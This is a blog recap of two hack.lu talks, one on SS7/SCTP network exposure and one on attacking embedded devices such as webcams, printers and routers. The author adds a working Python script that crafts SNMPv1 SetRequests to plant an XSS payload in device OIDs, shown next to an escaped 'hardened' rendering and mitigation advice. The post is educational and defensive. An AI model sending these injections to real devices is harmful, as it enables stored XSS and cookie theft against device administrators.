hack.lu Part #8

Welcome back to the last day of hack.lu!

The first presentation was given by Philippe Langlois about the diversity of network perimeters that companies have today. Philippe was one of the founders of Qualys! Today everybody uses SS7 networks! Do you remember phreaking with blue boxes? SS7 was deployed by operators and killed all phreaking activities (out-of-band digital signaling vs. the in-band CCITT tones that blue boxes abused). And today? What are the fraud types? SIP hacking replaced the well-known “calling card” fraud. SIP accounts are used in many call shops. VoIP gateways (like Asterisk) are also nice targets for hackers. Finally, SS7 attacks were reviewed (theft of service, control of call processing, DoS, call traffic rerouting, …).

Philippe explained the basics of SS7, which were completely new to me. He also explained the culture shock between the SS7 and IP worlds (different teams, open technologies, …). SS7 security is based on message screening at the MTP3 level, which works like ACLs. Interesting: all antennas used by mobile networks are monitored like any other device via standard network management software (HP OpenView is mainly used). I skipped the slides which described how SS7 works (too early in the morning for me!) but Philippe showed how to analyze SS7 packets using a standard sniffer like Wireshark. He also talked about SCTP, the transport protocol that carries SS7 signaling over IP (SIGTRAN). SCTP is often not blocked by firewalls: “we don’t have it inside, so why filter it?” But SCTP can be used to ping-scan Linux boxes: send an INIT chunk to any port and a live host answers with an INIT-ACK or an ABORT, either of which gives it away (tools exist for this, like SCTPscan). Conclusion: VoIP tools and protocols can have a negative impact on your network security! Take care!

The second presentation covered techniques to own embedded devices. Adrian Pastor, Senior White-hat Hacker at GNUCITIZEN, presented techniques to exploit the software installed on embedded devices. Why embedded devices? Because they are usually less secured than a classic server or workstation. In many cases the web console is the easiest way to compromise a device! Adrian explained two types of attacks: classic (without any interaction with the victim user) and the new generation (using an internal user as a “proxy”). Then a live hack was demonstrated against a well-known Axis webcam: the attacker replaces the standard video stream with a Flash animation played in a loop. The room “protected” by the camera can then be safely visited by robbers! Adrian also explained how owned devices can be used as a hop to enter an internal network (ex: some devices have PHP and minimal shell support). Passwords can also be easily found and reused against other internal devices (ex: SNMP communities, which are often the same on all devices). Funny: some printers (HP JetDirect) return the admin password, hex-encoded, in reply to a simple SNMP OID query!!! Once again, DNS poisoning can be used to redirect admin pages to malicious servers. UPnP is another vector for potential attacks (no authentication by default). A well-known story was the BT Home Hub! Some Wi-Fi routers are also vulnerable to predictable WEP/WPA keys or, worse, the key is printed on a label on the router itself! Adrian reviewed a lot of examples of how to own embedded devices and appliances (ex: the Aruba mobility controller or IP phones), with code examples. He spoke about a new type of attack: SNMP injection of HTML/JavaScript code! The idea is simple: write an XSS payload into OIDs like system.sysContact.0, system.sysName.0 or system.sysLocation.0 (a write community is enough), and the device’s web console renders it unescaped the next time an administrator looks at the status page! Finally, what about your ISP? Can you trust it? What does the router do with your traffic? Some ISPs perform automatic upgrades of routers, which means they have remote access! Damn!

Will DSL sniffing be the next step? Conclusions: secure your embedded devices (cameras, printers, …) and don’t trust them. That was a very nice presentation. Slides are available here.
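Because the SNMP injection trick is so simple, here is an added example of both halves of it (my own code for this post, not Adrian’s or GNUCITIZEN’s): a hand-rolled SNMPv1 SetRequest that writes a payload into sysContact.0 / sysName.0 / sysLocation.0, and a stand-in for the device status page showing the vulnerable rendering next to the hardened one. The community string, request-id, payload and `render_status_page()` are hypothetical; real devices differ in how they build the page, not in the mechanism.

```python
# SNMP injection into a device web console, as an added example; not
# code from the talk. Hypothetical parts: the community string, the
# request-id, the payload, and render_status_page(), which stands in for
# the device's own admin page.
import html
import socket

# OIDs from the MIB-II system group (RFC 1213), writable on most devices
SYS_CONTACT_0 = "1.3.6.1.2.1.1.4.0"
SYS_NAME_0 = "1.3.6.1.2.1.1.5.0"
SYS_LOCATION_0 = "1.3.6.1.2.1.1.6.0"


def _ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form (0x80|N followed by N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(value)) + value


def _ber_int(n: int) -> bytes:
    """INTEGER, non-negative values only (enough for SNMP request fields)."""
    return _tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big"))


def _ber_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed into one byte, base-128 after."""
    arcs = [int(a) for a in oid.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        enc = [arc & 0x7F]
        arc >>= 7
        while arc:
            enc.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(enc))
    return _tlv(0x06, bytes(out))


def snmpv1_set_string(community: str, oid: str, value: str, request_id: int = 1) -> bytes:
    """Encode an SNMPv1 SetRequest writing one OCTET STRING (RFC 1157)."""
    varbind = _tlv(0x30, _ber_oid(oid) + _tlv(0x04, value.encode()))
    pdu = _tlv(0xA3,                                        # SetRequest-PDU
               _ber_int(request_id) + _ber_int(0) + _ber_int(0)  # error-status, error-index
               + _tlv(0x30, varbind))
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)  # version 0 = v1


def render_status_page(values: dict, escape: bool) -> str:
    """Stand-in for the device admin page. escape=False is what the
    vulnerable consoles do: SNMP strings pasted straight into the HTML."""
    rows = []
    for label, text in values.items():
        cell = html.escape(text, quote=True) if escape else text
        rows.append(f"<tr><td>{label}</td><td>{cell}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def inject(target: str, community: str, payload: str) -> None:
    """Send the three SetRequests over UDP/161. Only against devices you own."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
        for i, oid in enumerate((SYS_CONTACT_0, SYS_NAME_0, SYS_LOCATION_0), 1):
            udp.sendto(snmpv1_set_string(community, oid, payload, request_id=i),
                       (target, 161))


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print("vulnerable:", render_status_page({"Contact": payload, "Location": "Lab"}, escape=False))
    print("hardened:  ", render_status_page({"Contact": payload}, escape=True))
    # inject("192.0.2.10", "private", payload)   # uncomment against a lab device
```

The fix on the device side is the last function with `escape=True`: anything that comes out of SNMP (or any other management channel) is attacker-controlled text and must be HTML-escaped before it reaches the admin’s browser. The fix on the network side is the one Adrian kept repeating: no default write community, and no SNMP reachable from where the users sit.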

Coffee break! I need caffeine!
